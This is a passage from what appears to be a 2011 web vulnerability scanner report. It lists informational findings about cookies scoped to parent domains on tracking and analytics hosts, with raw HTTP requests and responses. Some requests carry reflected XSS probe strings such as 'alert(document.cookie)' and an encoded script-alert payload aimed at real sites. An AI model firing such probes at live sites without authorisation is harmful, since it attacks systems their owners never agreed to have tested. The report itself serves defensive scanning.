Date: Sat, 30 Apr 2011 15:08:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DE12F5051D0ADA-40000133C024CEB6[CE]; Expires=Thu, 28 Apr 2016 15:08:26 GMT; Domain=.kodakgallery.com; Path=/
Location: http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777?AQB=1&pccr=true&vidn=26DE12F5051D0ADA-40000133C024CEB6&&ndh=1&t=30%2F3%2F2011%2010%3A8%3A45%206%20300&ns=kodakimagingnetwork&pageName=landing%20page%3Avisit%20florida&g=http%3A%2F%2Fwww.kodakgallery.com%2Fgallery%2Flp%2F2010%2Fvisit_florida%2Fvacation_photos.jsp%3Fe81c7*%2Falert(document.cookie)%2F%2F4c687dfaa6f%3D1&r=http%3A%2F%2Fburp%2Fshow%2F43&cc=USD&ch=landing%20page&server=www.kodakgallery.com&c1=landing%20page%3Avisit%20florida&h1=landing%20page%3Avisit%20florida&c3=site%20section&c4=burp%20%5Bref%5D%20--%20landing%20page%3Avisit%20florida&c5=700019816903%7Cnull&c7=landing%20page%3Avisit%20florida&c8=landing%20page&v8=landing%20page&c9=visit%20florida&v9=visit%20florida&v11=700019816903%7Cnull&v26=700019816903&v27=D%3Dg&v28=D%3Dg&v33=burp%20%5Bref%5D&c34=burp%20%5Bref%5D&v34=D%3Dc34&v35=D%3Dc34&tnt=25173%3A0%3A0%2C&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 15:08:26 GMT
Last-Modified: Sun, 01 May 2011 15:08:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www358
Content-Length: 0
Content-Type: text/plain


13.75. http://newbrowse.livehelper.com/servlet/lhBrowse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newbrowse.livehelper.com
Path:   /servlet/lhBrowse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/lhBrowse?ACTION=BTNREFRESH&RND=0.4528236691839993&p=Iowa.gov&c=1099892&b=company&g=Information%2520Services&op=&PAGEVISIT=true&r=1.442691869335249&a=Netscape&v=5&pl=Win32&dm=ia.gov&rf=http%3A//ia.gov/&tl=Iowa.gov%20LiveHelp&cs=true&pg=http%3A//ia.gov/livehelp.html&sd1=1156x1920&sd2=16&jsv=undefined&ps=&lot=1304161964473&ll=undefined&LC=1&pullFailed=0&nocache=0.2693614396266639&id=0&noCacheIE=1304161981692 HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: searsTest=TEST

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:13:11 GMT
Content-Type: text/javascript
Connection: keep-alive
X-Powered-By: ASP.NET
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Set-Cookie: st1099892=135396596z2011-04-30 06:12:26z; expires=Sun, 29-Apr-2012 10:58:59 GMT; domain=.livehelper.com
Content-Length: 122

var str ={"opstatus":0,"windowsize":null,"validity":null, "ispulled":null};obj = eval(str);eval(pool[0].getCallback(obj));

13.76. http://picasaweb.google.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Sat, 30 Apr 2011 12:24:40 GMT
Date: Sat, 30 Apr 2011 12:24:40 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=X_PtU7v2XMPm; Path=/; HttpOnly
Set-Cookie: S=photos_html=ix0DZ6k8-bwK23Dl7QumOQ; Domain=.google.com; Path=/; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=https%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttps%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

13.77. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Sat, 30 Apr 2011 12:24:41 GMT
Date: Sat, 30 Apr 2011 12:24:41 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=6IXo7JB8NOje; Path=/; HttpOnly
Set-Cookie: S=photos_html=Qkc8rdtYRURkQfoeZ14aWQ; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

13.78. http://pipes.yahoo.com/pipes/pipe.run  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pipes.yahoo.com
Path:   /pipes/pipe.run

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pipes/pipe.run HTTP/1.1
Host: pipes.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:24:42 GMT
Set-Cookie: B=3ek8guh6rnvsa&b=3&s=hk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private, max-age=3600
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Via: HTTP/1.1 r5.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Pipes: Rewire the Web</title><style type="text/css">
/* nn4 hide */
/*/*/
body {font:smal
...[SNIP]...

13.79. https://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: uid=1_1304111927_1304111927683:2889978505427215; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: kwd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: sit=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: cre=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: bpd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: apd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: scg=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: ppd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: afl=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:18:47 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- site #0 *not* found -->

13.80. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=101452&mt_adid=100283&v1=&v2=&v3=&s1=&s2=&s3=&ord=1341911543 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851768

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-x5.mediamath.com pid 0x337f 13183
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sat, 30 Apr 2011 15:08:29 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304176109; domain=.mathtag.com; path=/; expires=Sun, 29-Apr-2012 15:08:29 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.81. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=133885704;fpan=0;fpa=P0-1132785758-1304175835376;ns=1;url=http%3A%2F%2Fwww.in.gov%2Fdwd%2FWorkOne%2F%2F%3F513f2;ref=http%3A%2F%2Fwww.workoneworks.com%2F%3F513f2%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6c36e2d12eb%3D1;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304202080385;tzo=300;a=p-773__jh9iaI2Y HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EAQAD-8kjVmtjIMAAaUBAdEGgdIAmtGCqVKLPR_BobgwmkHrVrUwGjTBH-EQQBwSAAADBAG7ZL8Q8wwgNcdDECEbEgEiAaEosiUJYQCxLTNCMIIDBBjlEA6JIAECyESLKxA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/unpixel?id=961699&id=1050693&t=2
Set-Cookie: d=ENcAD-8kjVmtjIMAAZ8BAdEGgdIAmtGCqVKLPR_BobgwmkGpYgGjTBH-EQQBwSAAADBAG7ZLsgwgNcdDECEbEgEiAaEosiUJYQCxLTNCMIIDBBjlEA6JIAECyESLKxA; expires=Fri, 29-Jul-2011 22:20:59 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 30 Apr 2011 22:20:59 GMT
Server: QS


13.82. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=0.8367073847912252 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1185=2931142961646634775

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:08:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Mon, 30-May-2011 15:08:26 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Mon, 30-May-2011 15:08:26 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Thu, 27-Oct-2011 15:08:26 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.83. http://scholar.google.com/schhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=fc6b07d896d76b4d; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=fc6b07d896d76b4d:TM=1304166309:LM=1304166309:S=GyXBYpL8gFdlFl1A; expires=Mon, 29-Apr-2013 12:25:09 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 12:25:09 GMT
Server: scholar
Expires: Sat, 30 Apr 2011 12:25:09 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><link rel="canonical" href="/"><title>Google Scholar</title><style>body,td,a,
...[SNIP]...

13.84. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=startPage&page=http%3A//de.gov/topics/yourgovernment&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5637922666&scriptVersion=1.1&d=1304123925477&&amp;SESSIONVAR!skill=Portal_Topics&amp;PAGEVAR!skill=Portal_Topics&scriptType=SERVERBASED&title=Delaware.gov%20--%20Your%20Government&referrer= HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/yourgovernment
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3209989796884927126; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304123898833

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:38:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Set-Cookie: LivePersonID=-16601209214853-1304123902:-1:-1:-1:-1; expires=Sun, 29-Apr-2012 00:38:23 GMT; path=/hc/33511087; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89aP............,...........L.;

13.85. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /snap_shots.js HTTP/1.1
Host: shots.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Fri, 30-Apr-2010 12:28:18 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2%26origin%3Dshots; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Content-Length: 15083
Cache-Control: max-age=7200
Expires: Sat, 30 Apr 2011 14:28:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

13.86. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s21968461417127

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s21968461417127 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www96
Content-Length: 0
Content-Type: text/plain
Connection: close


13.87. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s22063515547197

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s22063515547197 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www377
Content-Length: 0
Content-Type: text/plain
Connection: close


